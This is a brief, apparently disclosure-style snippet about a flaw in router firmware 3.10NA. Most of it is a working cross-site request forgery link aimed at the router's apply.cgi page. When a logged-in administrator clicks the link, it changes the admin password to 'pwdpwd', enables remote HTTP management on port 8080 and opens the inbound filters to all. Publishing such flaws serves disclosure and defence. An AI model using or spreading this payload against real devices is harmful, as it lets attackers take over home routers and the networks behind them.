The hole is confirmed in firmware version 3.10NA.
Example (changes admin password to ‘pwdpwd’):
<a href="http://192.168.0.1/apply.cgi?admin_password=pwdpwd&admin_password1=pwdpwd&admPass2=pwdpwd&remote_enable=1&remote_http_management_enable=1&remote_http_management_port=8080&remote_inbound_filter=Allow_All&remote_http_management_inbound_filter=Allow_All">Change password on 192.168.0.1</a>